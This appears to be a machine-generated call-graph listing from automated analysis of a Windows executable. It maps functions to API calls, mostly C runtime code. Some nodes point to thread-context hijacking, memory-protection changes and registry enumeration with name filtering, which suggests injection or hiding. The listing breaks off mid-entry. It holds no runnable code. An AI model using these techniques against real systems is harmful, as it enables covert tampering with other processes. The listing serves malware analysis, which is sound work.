_invalid_parameter_noinfo 15 API calls 16023->16024 16025 13f08e6c467 16024->16025 16044 13f08e6ffe8 16025->16044 16031 13f08e6cce4 GetLastError 16030->16031 16032 13f08e6cd1f 16030->16032 16033 13f08e6ccf4 16031->16033 16032->16013 16036 13f08e6cd34 16032->16036 16039 13f08e6cba0 16033->16039 16037 13f08e6cd50 GetLastError SetLastError 16036->16037 16038 13f08e6cd68 16036->16038 16037->16038 16038->16012 16038->16013 16040 13f08e6cbc4 16039->16040 16041 13f08e6cbc8 FlsGetValue 16039->16041 16042 13f08e6c940 _invalid_parameter_noinfo 13 API calls 16040->16042 16043 13f08e6cbde SetLastError 16040->16043 16041->16040 16042->16043 16043->16032 16045 13f08e70001 16044->16045 16046 13f08e6c48f 16044->16046 16045->16046 16052 13f08e70a40 16045->16052 16048 13f08e70054 16046->16048 16049 13f08e6c49f 16048->16049 16050 13f08e7006d 16048->16050 16049->16003 16050->16049 16070 13f08e6e8c4 16050->16070 16061 13f08e6cab0 16052->16061 16054 13f08e70a4f 16060 13f08e70a95 16054->16060 16069 13f08e6c558 EnterCriticalSection 16054->16069 16060->16046 16062 13f08e6cb10 __std_exception_copy 13 API calls 16061->16062 16064 13f08e6cab9 16062->16064 16063 13f08e6cabe 16063->16054 16064->16063 16065 13f08e6cae8 FlsGetValue 16064->16065 16066 13f08e6cae4 16064->16066 16065->16066 16067 13f08e6c940 _invalid_parameter_noinfo 13 API calls 16066->16067 16068 13f08e6cafe 16066->16068 16067->16068 16068->16054 16071 13f08e6cab0 _invalid_parameter_noinfo 14 API calls 16070->16071 16072 13f08e6e8cd 16071->16072 16074 13f08e6ef02 16073->16074 16075 13f08e6ef1f 16073->16075 16074->16075 16076 13f08e6ef10 16074->16076 16078 13f08e6ef29 16075->16078 16164 13f08e719f0 16075->16164 16079 13f08e6d1f4 __std_exception_copy 13 API calls 16076->16079 16171 13f08e71a40 16078->16171 16081 13f08e6ef15 16079->16081 16081->15901 16083 13f08e713e0 16082->16083 16084 13f08e713f5 16083->16084 16086 13f08e7140e 16083->16086 16085 13f08e6d1f4 __std_exception_copy 13 API calls 16084->16085 16087 13f08e713fa 16085->16087 16089 13f08e6dd78 14 API calls 16086->16089 16090 13f08e71405 16086->16090 16088 13f08e6d04c _invalid_parameter_noinfo 38 API calls 16087->16088 16088->16090 16089->16090 16090->15898 16092 13f08e6dd9c 16091->16092 16093 13f08e6db0b 16091->16093 16092->16093 16094 13f08e6cab0 _invalid_parameter_noinfo 14 API calls 16092->16094 16093->15918 16099 13f08e6f198 16093->16099 16095 13f08e6ddb7 16094->16095 16190 13f08e6ffb4 16095->16190 16100 13f08e6f1a9 16099->16100 16101 13f08e6f1ca 16099->16101 16100->16101 16198 13f08e6ef88 16100->16198 16101->15918 16104 13f08e6d336 16103->16104 16105 13f08e6d35a 16103->16105 16108 13f08e6d2a0 __free_lconv_num 13 API calls 16104->16108 16124 13f08e6d345 FindFirstFileExW 16104->16124 16106 13f08e6d3bf 16105->16106 16107 13f08e6d35f 16105->16107 16217 13f08e6ec58 16106->16217 16110 13f08e6d2a0 __free_lconv_num 13 API calls 16107->16110 16115 13f08e6d374 16107->16115 16107->16124 16108->16124 16110->16115 16111 13f08e6c5d0 14 API calls 16111->16124 16115->16111 16124->15922 16124->15931 16126 13f08e6d4d6 16125->16126 16127 13f08e6d4fa 16125->16127 16131 13f08e6d2a0 __free_lconv_num 13 API calls 16126->16131 16132 13f08e6d4e5 16126->16132 16128 13f08e6d55f 16127->16128 16129 13f08e6d500 16127->16129 16220 13f08e6ece8 16128->16220 16129->16132 16133 13f08e6d515 16129->16133 16135 13f08e6d2a0 __free_lconv_num 13 API calls 16129->16135 16131->16132 16132->15931 16136 13f08e6c5d0 14 API calls 16133->16136 16135->16133 16136->16132 16148 13f08e70b52 16147->16148 16149 13f08e6d1f4 __std_exception_copy 13 API calls 16148->16149 16154 13f08e70b67 16148->16154 16150 13f08e70b5c 16149->16150 16151 13f08e6d04c _invalid_parameter_noinfo 38 API calls 16150->16151 16151->16154 16152 13f08e68070 _invalid_parameter_noinfo 8 API calls 16153 13f08e70ea8 16152->16153 16153->15935 16154->16152 16156 13f08e68079 16155->16156 16157 13f08e68084 16156->16157 16158 13f08e68848 IsProcessorFeaturePresent 16156->16158 16157->15850 16159 13f08e68860 16158->16159 16223 13f08e6891c RtlCaptureContext 16159->16223 16165 13f08e71a12 HeapSize 16164->16165 16166 13f08e719f9 16164->16166 16167 13f08e6d1f4 __std_exception_copy 13 API calls 16166->16167 16168 13f08e719fe 16167->16168 16169 13f08e6d04c _invalid_parameter_noinfo 38 API calls 16168->16169 16170 13f08e71a09 16169->16170 16170->16078 16172 13f08e71a55 16171->16172 16173 13f08e71a5f 16171->16173 16183 13f08e6c5d0 16172->16183 16175 13f08e71a64 16173->16175 16181 13f08e71a6b _invalid_parameter_noinfo 16173->16181 16176 13f08e6d2a0 __free_lconv_num 13 API calls 16175->16176 16179 13f08e71a5d 16176->16179 16177 13f08e71a71 16180 13f08e6d1f4 __std_exception_copy 13 API calls 16177->16180 16178 13f08e71a9e HeapReAlloc 16178->16179 16178->16181 16179->16081 16180->16179 16181->16177 16181->16178 16182 13f08e6b470 _invalid_parameter_noinfo 2 API calls 16181->16182 16182->16181 16184 13f08e6c61b 16183->16184 16189 13f08e6c5df _invalid_parameter_noinfo 16183->16189 16185 13f08e6d1f4 __std_exception_copy 13 API calls 16184->16185 16187 13f08e6c619 16185->16187 16186 13f08e6c602 HeapAlloc 16186->16187 16186->16189 16187->16179 16188 13f08e6b470 _invalid_parameter_noinfo 2 API calls 16188->16189 16189->16184 16189->16186 16189->16188 16191 13f08e6ddda 16190->16191 16192 13f08e6ffc9 16190->16192 16194 13f08e70020 16191->16194 16192->16191 16193 13f08e70a40 _invalid_parameter_noinfo 14 API calls 16192->16193 16193->16191 16195 13f08e70035 16194->16195 16196 13f08e70048 16194->16196 16195->16196 16197 13f08e6e8c4 _invalid_parameter_noinfo 14 API calls 16195->16197 16196->16093 16197->16196 16199 13f08e6f078 16198->16199 16212 13f08e6efbd __vcrt_FlsAlloc 16198->16212 16216 13f08e6c558 EnterCriticalSection 16199->16216 16201 13f08e6efe2 LoadLibraryExW 16204 13f08e6f107 16201->16204 16205 13f08e6f007 GetLastError 16201->16205 16203 13f08e6f120 GetProcAddress 16203->16199 16204->16203 16207 13f08e6f117 FreeLibrary 16204->16207 16205->16212 16207->16203 16212->16199 16212->16201 16212->16203 16215 13f08e6f041 LoadLibraryExW 16212->16215 16215->16204 16215->16212 16219 13f08e6ec61 MultiByteToWideChar 16217->16219 16222 13f08e6ed0c WideCharToMultiByte 16220->16222 16224 13f08e68936 RtlLookupFunctionEntry 16223->16224 16225 13f08e68873 16224->16225 16226 13f08e6894c RtlVirtualUnwind 16224->16226 16227 13f08e68814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16225->16227 16226->16224 16226->16225 16229 13f08e6cdba _invalid_parameter_noinfo 16228->16229 16230 13f08e6cde2 RtlCaptureContext RtlLookupFunctionEntry 16229->16230 16231 13f08e6ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16230->16231 16232 13f08e6ce2e RtlVirtualUnwind 16230->16232 16233 13f08e6ceb6 _invalid_parameter_noinfo 16231->16233 16232->16231 16234 13f08e68070 _invalid_parameter_noinfo 8 API calls 16233->16234 16235 13f08e6ced5 GetCurrentProcess TerminateProcess 16234->16235 16236 13f08e6fe20 16237 13f08e6fe4a 16236->16237 16238 13f08e6d220 _invalid_parameter_noinfo 13 API calls 16237->16238 16239 13f08e6fe6a 16238->16239 16240 13f08e6d2a0 __free_lconv_num 13 API calls 16239->16240 16241 13f08e6fe78 16240->16241 16242 13f08e6fea2 16241->16242 16243 13f08e6d220 _invalid_parameter_noinfo 13 API calls 16241->16243 16244 13f08e6fec1 InitializeCriticalSectionEx 16242->16244 16246 13f08e6feab 16242->16246 16245 13f08e6fe94 16243->16245 16244->16242 16247 13f08e6d2a0 __free_lconv_num 13 API calls 16245->16247 16247->16242 17936 13f08e6f820 17939 13f08e6f7d8 17936->17939 17944 13f08e6c558 EnterCriticalSection 17939->17944 17166 13f08e64320 17169 13f08e6426d 17166->17169 17167 13f08e642d7 17168 13f08e642bd VirtualQuery 17168->17167 17168->17169 17169->17167 17169->17168 17170 13f08e64322 GetLastError 17169->17170 17170->17167 17170->17169 17176 13f08e6872c 17179 13f08e690c0 17176->17179 17178 13f08e68755 17180 13f08e69116 17179->17180 17181 13f08e690e1 17179->17181 17180->17178 17181->17180 17183 13f08e6c328 17181->17183 17184 13f08e6c335 17183->17184 17185 13f08e6c33f 17183->17185 17184->17185 17189 13f08e6c35a 17184->17189 17186 13f08e6d1f4 __std_exception_copy 13 API calls 17185->17186 17191 13f08e6c346 17186->17191 17187 13f08e6d04c _invalid_parameter_noinfo 38 API calls 17188 13f08e6c352 17187->17188 17188->17180 17189->17188 17190 13f08e6d1f4 __std_exception_copy 13 API calls 17189->17190 17190->17191 17191->17187 17954 13f08e6c828 17955 13f08e6c82d 17954->17955 17956 13f08e6c842 17954->17956 17960 13f08e6c848 17955->17960 17961 13f08e6c892 17960->17961 17962 13f08e6c88a 17960->17962 17964 13f08e6d2a0 __free_lconv_num 13 API calls 17961->17964 17963 13f08e6d2a0 __free_lconv_num 13 API calls 17962->17963 17963->17961 17965 13f08e6c89f 17964->17965 17966 13f08e6d2a0 __free_lconv_num 13 API calls 17965->17966 17967 13f08e6c8ac 17966->17967 17968 13f08e6d2a0 __free_lconv_num 13 API calls 17967->17968 17969 13f08e6c8b9 17968->17969 17970 13f08e6d2a0 __free_lconv_num 13 API calls 17969->17970 17971 13f08e6c8c6 17970->17971 17972 13f08e6d2a0 __free_lconv_num 13 API calls 17971->17972 17973 13f08e6c8d3 17972->17973 17974 13f08e6d2a0 __free_lconv_num 13 API calls 17973->17974 17975 13f08e6c8e0 17974->17975 17976 13f08e6d2a0 __free_lconv_num 13 API calls 17975->17976 17977 13f08e6c8ed 17976->17977 17978 13f08e6d2a0 __free_lconv_num 13 API calls 17977->17978 17979 13f08e6c8fd 17978->17979 17980 13f08e6d2a0 __free_lconv_num 13 API calls 17979->17980 17981 13f08e6c90d 17980->17981 17986 13f08e6c6f8 17981->17986 18000 13f08e6c558 EnterCriticalSection 17986->18000 18458 13f08e6bd34 18459 13f08e6bd4d 18458->18459 18472 13f08e6bd49 18458->18472 18460 13f08e6e864 56 API calls 18459->18460 18461 13f08e6bd52 18460->18461 18473 13f08e6edc8 GetEnvironmentStringsW 18461->18473 18464 13f08e6bd5f 18466 13f08e6d2a0 __free_lconv_num 13 API calls 18464->18466 18465 13f08e6bd6b 18493 13f08e6bda8 18465->18493 18466->18472 18469 13f08e6d2a0 __free_lconv_num 13 API calls 18470 13f08e6bd92 18469->18470 18471 13f08e6d2a0 __free_lconv_num 13 API calls 18470->18471 18471->18472 18474 13f08e6bd57 18473->18474 18475 13f08e6edf8 18473->18475 18474->18464 18474->18465 18476 13f08e6ece8 WideCharToMultiByte 18475->18476 18477 13f08e6ee49 18476->18477 18478 13f08e6ee53 FreeEnvironmentStringsW 18477->18478 18479 13f08e6c5d0 14 API calls 18477->18479 18478->18474 18480 13f08e6ee63 18479->18480 18481 13f08e6ee74 18480->18481 18482 13f08e6ee6b 18480->18482 18484 13f08e6ece8 WideCharToMultiByte 18481->18484 18483 13f08e6d2a0 __free_lconv_num 13 API calls 18482->18483 18485 13f08e6ee72 18483->18485 18486 13f08e6ee97 18484->18486 18485->18478 18487 13f08e6eea5 18486->18487 18488 13f08e6ee9b 18486->18488 18489 13f08e6d2a0 __free_lconv_num 13 API calls 18487->18489 18490 13f08e6d2a0 __free_lconv_num 13 API calls 18488->18490 18491 13f08e6eea3 FreeEnvironmentStringsW 18489->18491 18490->18491 18491->18474 18494 13f08e6bdcd 18493->18494 18495 13f08e6d220 _invalid_parameter_noinfo 13 API calls 18494->18495 18505 13f08e6be03 18495->18505 18496 13f08e6d2a0 __free_lconv_num 13 API calls 18498 13f08e6bd73 18496->18498 18497 13f08e6be6d 18499 13f08e6d2a0 __free_lconv_num 13 API calls 18497->18499 18498->18469 18499->18498 18500 13f08e6d220 _invalid_parameter_noinfo 13 API calls 18500->18505 18501 13f08e6be92 18502 13f08e6bebc 13 API calls 18501->18502 18504 13f08e6be9a 18502->18504 18503 13f08e6c328 __std_exception_copy 38 API calls 18503->18505 18506 13f08e6d2a0 __free_lconv_num 13 API calls 18504->18506 18505->18497 18505->18500 18505->18501 18505->18503 18507 13f08e6bea6 18505->18507 18508 13f08e6be0b 18505->18508 18510 13f08e6d2a0 __free_lconv_num 13 API calls 18505->18510 18506->18508 18509 13f08e6d06c _invalid_parameter_noinfo 17 API calls 18507->18509 18508->18496 18511 13f08e6beb9 18509->18511 18510->18505 18002 13f08e6ec30 GetCommandLineA GetCommandLineW 18003 13f08e66430 18004 13f08e6643d 18003->18004 18005 13f08e66449 18004->18005 18011 13f08e6655a 18004->18011 18006 13f08e664cd 18005->18006 18007 13f08e664a6 SetThreadContext 18005->18007 18007->18006 18008 13f08e66581 VirtualProtect FlushInstructionCache 18008->18011 18009 13f08e6663e 18010 13f08e6665e 18009->18010 18019 13f08e64b20 18009->18019 18023 13f08e65530 GetCurrentProcess 18010->18023 18011->18008 18011->18009 18014 13f08e666b7 18017 13f08e68070 _invalid_parameter_noinfo 8 API calls 18014->18017 18015 13f08e66677 ResumeThread 18016 13f08e66663 18015->18016 18016->18014 18016->18015 18018 13f08e666ff 18017->18018 18022 13f08e64b3c 18019->18022 18020 13f08e64b9f 18020->18010 18021 13f08e64b52 VirtualFree 18021->18022 18022->18020 18022->18021 18024 13f08e6554c 18023->18024 18025 13f08e65593 18024->18025 18026 13f08e65562 VirtualProtect FlushInstructionCache 18024->18026 18025->18016 18026->18024 15072 13f08e61e3c LoadLibraryA GetProcAddress 15073 13f08e61e62 SleepEx 15072->15073 15074 13f08e61e6f 15072->15074 15073->15073 17225 13f08e62300 17226 13f08e62331 17225->17226 17227 13f08e62447 17226->17227 17233 13f08e62412 17226->17233 17235 13f08e62355 17226->17235 17228 13f08e624bb 17227->17228 17229 13f08e6244c 17227->17229 17232 13f08e635c8 11 API calls 17228->17232 17228->17233 17242 13f08e635c8 GetProcessHeap HeapAlloc 17229->17242 17231 13f08e6238d StrCmpNIW 17231->17235 17232->17233 17235->17231 17235->17233 17236 13f08e61d30 17235->17236 17237 13f08e61db4 17236->17237 17238 13f08e61d57 GetProcessHeap HeapAlloc 17236->17238 17237->17235 17238->17237 17239 13f08e61d92 17238->17239 17248 13f08e61cfc 17239->17248 17245 13f08e6361b 17242->17245 17243 13f08e636d9 GetProcessHeap HeapFree 17243->17233 17244 13f08e636d4 17244->17243 17245->17243 17245->17244 17246 13f08e63666 StrCmpNIW 17245->17246 17247 13f08e61d30 6 API calls 17245->17247 17246->17245 17247->17245 17249 13f08e61d1c GetProcessHeap HeapFree 17248->17249 17250 13f08e61d13 17248->17250 17249->17237 17251 13f08e61530 2 API calls 17250->17251 17251->17249 18566 13f08e6b500 18571 13f08e6c558 EnterCriticalSection 18566->18571 16287 13f08e6820c 16294 13f08e68f34 16287->16294 16293 13f08e68219 16295 13f08e69340 __CxxCallCatchBlock 9 API calls 16294->16295 16296 13f08e68215 16295->16296 16296->16293 16297 13f08e6c288 16296->16297 16298 13f08e6cb10 __std_exception_copy 13 API calls 16297->16298 16299 13f08e68222 16298->16299 16299->16293 16300 13f08e68f48 16299->16300 16303 13f08e692dc 16300->16303 16302 13f08e68f51 16302->16293 16304 13f08e692ed 16303->16304 16308 13f08e69302 16303->16308 16305 13f08e69c8c __CxxCallCatchBlock 6 API calls 16304->16305 16306 13f08e692f2 16305->16306 16309 13f08e69cd4 16306->16309 16308->16302 16310 13f08e69aac __vcrt_FlsAlloc 5 API calls 16309->16310 16311 13f08e69d02 16310->16311 16312 13f08e69d14 TlsSetValue 16311->16312 16313 13f08e69d0c 16311->16313 16312->16313 16313->16308 17279 13f08e68f0c 17286 13f08e6946c 17279->17286 17284 13f08e68f19 17287 13f08e69474 17286->17287 17289 13f08e694a5 17287->17289 17290 13f08e68f15 17287->17290 17303 13f08e69d28 17287->17303 17291 13f08e694b4 __vcrt_uninitialize_locks DeleteCriticalSection 17289->17291 17290->17284 17292 13f08e69400 17290->17292 17291->17290 17308 13f08e69bfc 17292->17308 17304 13f08e69aac __vcrt_FlsAlloc 5 API calls 17303->17304 17305 13f08e69d5e 17304->17305 17306 13f08e69d73 InitializeCriticalSectionAndSpinCount 17305->17306 17307 13f08e69d68 17305->17307 17306->17307 17307->17287 17309 13f08e69aac __vcrt_FlsAlloc 5 API calls 17308->17309 17310 13f08e69c21 TlsAlloc 17309->17310 16323 13f08e74611 __scrt_dllmain_exception_filter 18582 13f08e6c510 18583 13f08e6c518 18582->18583 18584 13f08e6c545 18583->18584 18586 13f08e6c574 18583->18586 18587 13f08e6c59f 18586->18587 18588 13f08e6c5a3 18587->18588 18589 13f08e6c582 DeleteCriticalSection 18587->18589 18588->18584 18589->18587 16325 13f08e6c218 16326 13f08e6d2a0 __free_lconv_num 13 API calls 16325->16326 16327 13f08e6c228 16326->16327 16328 13f08e6d2a0 __free_lconv_num 13 API calls 16327->16328 16329 13f08e6c23c 16328->16329 16330 13f08e6d2a0 __free_lconv_num 13 API calls 16329->16330 16331 13f08e6c250 16330->16331 16332 13f08e6d2a0 __free_lconv_num 13 API calls 16331->16332 16333 13f08e6c264 16332->16333 18598 13f08e62518 GetProcessIdOfThread GetCurrentProcessId 18599 13f08e62543 CreateFileW 18598->18599 18600 13f08e625be 18598->18600 18599->18600 18601 13f08e62577 WriteFile ReadFile CloseHandle 18599->18601 18601->18600 18068 13f08e663e3 18069 13f08e663f0 18068->18069 18070 13f08e6655a 18069->18070 18071 13f08e663fc GetThreadContext 18069->18071 18074 13f08e66581 VirtualProtect FlushInstructionCache 18070->18074 18076 13f08e6663e 18070->18076 18071->18070 18072 13f08e66422 18071->18072 18072->18070 18073 13f08e66449 18072->18073 18079 13f08e664cd 18073->18079 18080 13f08e664a6 SetThreadContext 18073->18080 18074->18070 18075 13f08e6665e 18077 13f08e65530 3 API calls 18075->18077 18076->18075 18078 13f08e64b20 VirtualFree 18076->18078 18083 13f08e66663 18077->18083 18078->18075 18080->18079 18081 13f08e666b7 18084 13f08e68070 _invalid_parameter_noinfo 8 API calls 18081->18084 18082 13f08e66677 ResumeThread 18082->18083 18083->18081 18083->18082 18085 13f08e666ff 18084->18085 18086 13f08e6f3e4 18087 13f08e6f41d 18086->18087 18088 13f08e6f3ee 18086->18088 18088->18087 18089 13f08e6f403 FreeLibrary 18088->18089 18089->18088 18090 13f08e733e4 18091 13f08e733f5 CloseHandle 18090->18091 18092 13f08e733fb 18090->18092 18091->18092 17312 13f08e706e0 17313 13f08e706e9 17312->17313 17317 13f08e706f9 17312->17317 17314 13f08e6d1f4 __std_exception_copy 13 API calls 17313->17314 17315 13f08e706ee 17314->17315 17316 13f08e6d04c _invalid_parameter_noinfo 38 API calls 17315->17316 17316->17317 18141 13f08e6b7ea 18142 13f08e6c2f4 14 API calls 18141->18142 18143 13f08e6b7ef 18142->18143 18144 13f08e6b815 GetModuleHandleW 18143->18144 18145 13f08e6b85f 18143->18145 18144->18145 18149 13f08e6b822 18144->18149 18158 13f08e6b6f8 18145->18158 18149->18145 18153 13f08e6b904 GetModuleHandleExW 18149->18153 18154 13f08e6b938 GetProcAddress 18153->18154 18157 13f08e6b94a 18153->18157 18154->18157 18155 13f08e6b962 18155->18145 18156 13f08e6b95b FreeLibrary 18156->18155 18157->18155 18157->18156 18170 13f08e6c558 EnterCriticalSection 18158->18170 18178 13f08e627e8 18179 13f08e62867 18178->18179 18180 13f08e628c9 GetFileType 18179->18180 18192 13f08e62998 18179->18192 18181 13f08e628ed 18180->18181 18182 13f08e628d7 StrCpyW 18180->18182 18184 13f08e61ad4 4 API calls 18181->18184 18183 13f08e628fc 18182->18183 18186 13f08e6299d 18183->18186 18187 13f08e62906 18183->18187 18184->18183 18185 13f08e63f88 StrCmpNIW 18185->18186 18186->18185 18189 13f08e63708 4 API calls 18186->18189 18190 13f08e61dd4 2 API calls 18186->18190 18186->18192 18188 13f08e63f88 StrCmpNIW 18187->18188 18191 13f08e63708 4 API calls 18187->18191 18187->18192 18193 13f08e61dd4 2 API calls 18187->18193 18188->18187 18189->18186 18190->18186 18191->18187 18193->18187 17324 13f08e746f5 17325 13f08e69324 __CxxCallCatchBlock 9 API calls 17324->17325 17326 13f08e7470d 17325->17326 17327 13f08e69324 __CxxCallCatchBlock 9 API calls 17326->17327 17328 13f08e74728 17327->17328 17329 13f08e69324 __CxxCallCatchBlock 9 API calls 17328->17329 17330 13f08e7473c 17329->17330 17331 13f08e69324 __CxxCallCatchBlock 9 API calls 17330->17331 17332 13f08e7477e 17331->17332 18207 13f08e62ff0 18208 13f08e63061 18207->18208 18209 13f08e63384 18208->18209 18210 13f08e6308d GetModuleHandleA 18208->18210 18211 13f08e630b1 18210->18211 18212 13f08e6309f GetProcAddress 18210->18212 18211->18209 18213 13f08e630d8 StrCmpNIW 18211->18213 18212->18211 18213->18209 18214 13f08e630fd 18213->18214 18214->18209 18215 13f08e61a30 6 API calls 18214->18215 18216 13f08e6320f lstrlenW 18214->18216 18217 13f08e632b9 lstrlenW 18214->18217 18218 13f08e63f88 StrCmpNIW 18214->18218 18219 13f08e61cfc StrCmpIW StrCmpW 18214->18219 18215->18214 18216->18214 18217->18214 18218->18214 18219->18214 18233 13f08e6cbfc 18238 13f08e6f3a0 18233->18238 18235 13f08e6cc05 18236 13f08e6cb10 __std_exception_copy 13 API calls 18235->18236 18237 13f08e6cc22 __vcrt_uninitialize_ptd 18235->18237 18236->18237 18239 13f08e6f3b5 18238->18239 18240 13f08e6f3b1 18238->18240 18239->18240 18241 13f08e6ef88 9 API calls 18239->18241 18240->18235 18241->18240 16340 13f08e641f9 16342 13f08e64146 16340->16342 16341 13f08e641b0 16342->16341 16343 13f08e64196 VirtualQuery 16342->16343 16344 13f08e641ca VirtualAlloc 16342->16344 16343->16341 16343->16342 16344->16341 16345 13f08e641fb GetLastError 16344->16345 16345->16342 18242 13f08e65ff9 18243 13f08e66000 VirtualProtect 18242->18243 18244 13f08e66029 GetLastError 18243->18244 18245 13f08e65f10 18243->18245 18244->18245 14963 13f08e61bc4 14970 13f08e61724 GetProcessHeap HeapAlloc 14963->14970 14965 13f08e61bda SleepEx 14966 13f08e61724 50 API calls 14965->14966 14967 13f08e61bd3 14966->14967 14967->14965 14969 13f08e6159c StrCmpIW StrCmpW 14967->14969 15021 13f08e619b0 14967->15021 14969->14967 15038 13f08e61264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14970->15038 14972 13f08e6174c 15039 13f08e61000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14972->15039 14974 13f08e61754 15040 13f08e61264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14974->15040 14976 13f08e6175d 15041 13f08e61264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14976->15041 14978 13f08e61766 15042 13f08e61264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14978->15042 14980 13f08e6176f 15043 13f08e61000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14980->15043 14982 13f08e61778 15044 13f08e61000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14982->15044 14984 13f08e61781 15045 13f08e61000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14984->15045 14986 13f08e6178a RegOpenKeyExW 14987 13f08e619a2 14986->14987 14988 13f08e617bc RegOpenKeyExW 14986->14988 14987->14967 14989 13f08e617e5 14988->14989 14990 13f08e617fb RegOpenKeyExW 14988->14990 15052 13f08e612b8 RegQueryInfoKeyW 14989->15052 14992 13f08e61836 RegOpenKeyExW 14990->14992 14993 13f08e6181f 14990->14993 14994 13f08e61871 RegOpenKeyExW 14992->14994 14995 13f08e6185a 14992->14995 15046 13f08e6104c RegQueryInfoKeyW 14993->15046 14999 13f08e61895 14994->14999 15000 13f08e618ac RegOpenKeyExW 14994->15000 14998 13f08e612b8 16 API calls 14995->14998 15002 13f08e61867 RegCloseKey 14998->15002 15003 13f08e612b8 16 API calls 14999->15003 15004 13f08e618d0 15000->15004 15005 13f08e618e7 RegOpenKeyExW 15000->15005 15002->14994 15006 13f08e618a2 RegCloseKey 15003->15006 15007 13f08e612b8 16 API calls 15004->15007 15008 13f08e61922 RegOpenKeyExW 15005->15008 15009 13f08e6190b 15005->15009 15006->15000 15012 13f08e618dd RegCloseKey 15007->15012 15010 13f08e61946 15008->15010 15011 13f08e6195d RegOpenKeyExW 15008->15011 15013 13f08e6104c 6 API calls 15009->15013 15014 13f08e6104c 6 API calls 15010->15014 15015 13f08e61981 15011->15015 15016 13f08e61998 RegCloseKey 15011->15016 15012->15005 15017 13f08e61918 RegCloseKey 15013->15017 15018 13f08e61953 RegCloseKey 15014->15018 15019 13f08e6104c 6 API calls 15015->15019 15016->14987 15017->15008 15018->15011 15020 13f08e6198e RegCloseKey 15019->15020 15020->15016 15066 13f08e614a0 15021->15066 15038->14972 15039->14974 15040->14976 15041->14978 15042->14980 15043->14982 15044->14984 15045->14986 15047 13f08e611b5 RegCloseKey 15046->15047 15048 13f08e610bf 15046->15048 15047->14992 15048->15047 15049 13f08e610cf RegEnumValueW 15048->15049 15050 13f08e61125 15049->15050 15050->15047 15050->15049 15051 13f08e6114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15050->15051 15051->15050 15053 13f08e61486 RegCloseKey 15052->15053 15054 13f08e61323 GetProcessHeap HeapAlloc 15052->15054 15053->14990 15055 13f08e61472 GetProcessHeap HeapFree 15054->15055 15056 13f08e6134e RegEnumValueW 15054->15056 15055->15053 15058 13f08e613a1 15056->15058 15058->15055 15058->15056 15059 13f08e613cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15058->15059 15060 13f08e6141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15058->15060 15061 13f08e61530 15058->15061 15059->15060 15060->15058 15062 13f08e61580 15061->15062 15065 13f08e6154a 15061->15065 15062->15058 15063 13f08e61561 StrCmpIW 15063->15065 15064 13f08e61569 StrCmpW 15064->15065 15065->15062 15065->15063 15065->15064 15067 13f08e614e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15066->15067 15068 13f08e614c2 GetProcessHeap HeapFree 15066->15068 15068->15067 15068->15068 18246 13f08e747c2 18247 13f08e69978 __CxxCallCatchBlock 9 API calls 18246->18247 18252 13f08e747d5 18247->18252 18248 13f08e69324 __CxxCallCatchBlock 9 API calls 18249 13f08e74828 18248->18249 18250 13f08e69324 __CxxCallCatchBlock 9 API calls 18249->18250 18251 13f08e74838 18250->18251 18253 13f08e68ff8 __CxxCallCatchBlock 9 API calls 18252->18253 18254 13f08e74814 __CxxCallCatchBlock 18252->18254 18253->18254 18254->18248 16346 13f08e681c0 16347 13f08e681c9 __scrt_release_startup_lock 16346->16347 16349 13f08e681cd 16347->16349 16350 13f08e6bbb4 16347->16350 16351 13f08e6bbd4 16350->16351 16378 13f08e6bbed 16350->16378 16352 13f08e6bbf2 16351->16352 16353 13f08e6bbdc 16351->16353 16379 13f08e6e864 16352->16379 16354 13f08e6d1f4 __std_exception_copy 13 API calls 16353->16354 16356 13f08e6bbe1 16354->16356 16358 13f08e6d04c _invalid_parameter_noinfo 38 API calls 16356->16358 16358->16378 16363 13f08e6bb54 13 API calls 16364 13f08e6bc61 16363->16364 16365 13f08e6bc69 16364->16365 16366 13f08e6bc7a 16364->16366 16367 13f08e6d1f4 __std_exception_copy 13 API calls 16365->16367 16368 13f08e6b994 14 API calls 16366->16368 16369 13f08e6bc6e 16367->16369 16370 13f08e6bc96 16368->16370 16371 13f08e6d2a0 __free_lconv_num 13 API calls 16369->16371 16370->16369 16372 13f08e6bcc6 16370->16372 16373 13f08e6bcdf 16370->16373 16371->16378 16374 13f08e6d2a0 __free_lconv_num 13 API calls 16372->16374 16376 13f08e6d2a0 __free_lconv_num 13 API calls 16373->16376 16375 13f08e6bccf 16374->16375 16377 13f08e6d2a0 __free_lconv_num 13 API calls 16375->16377 16376->16369 16377->16378 16378->16349 16380 13f08e6e871 16379->16380 16381 13f08e6bbf7 16379->16381 16403 13f08e6cacc 16380->16403 16385 13f08e6df38 GetModuleFileNameW 16381->16385 16383 13f08e6e8a0 16408 13f08e6e53c 16383->16408 16386 13f08e6df91 16385->16386 16387 13f08e6df7d GetLastError 16385->16387 16388 13f08e6dd78 14 API calls 16386->16388 16551 13f08e6d184 16387->16551 16391 13f08e6dfbf 16388->16391 16390 13f08e6df8a 16392 13f08e68070 _invalid_parameter_noinfo 8 API calls 16390->16392 16393 13f08e6f198 9 API calls 16391->16393 16396 13f08e6dfd0 16391->16396 16395 13f08e6bc0e 16392->16395 16393->16396 16397 13f08e6b994 16395->16397 16556 13f08e6de1c 16396->16556 16399 13f08e6b9d2 16397->16399 16401 13f08e6ba38 16399->16401 16573 13f08e6ec1c 16399->16573 16400 13f08e6bb25 16400->16363 16401->16400 16402 13f08e6ec1c 14 API calls 16401->16402 16402->16401 16404 13f08e6cae8 FlsGetValue 16403->16404 16405 13f08e6cae4 16403->16405 16404->16405 16406 13f08e6c940 _invalid_parameter_noinfo 13 API calls 16405->16406 16407 13f08e6cafe 16405->16407 16406->16407 16407->16383 16431 13f08e6e7ac 16408->16431 16413 13f08e6e58e 16413->16381 16414 13f08e6c5d0 14 API calls 16415 13f08e6e59f 16414->16415 16416 13f08e6e5a7 16415->16416 16418 13f08e6e5b6 16415->16418 16417 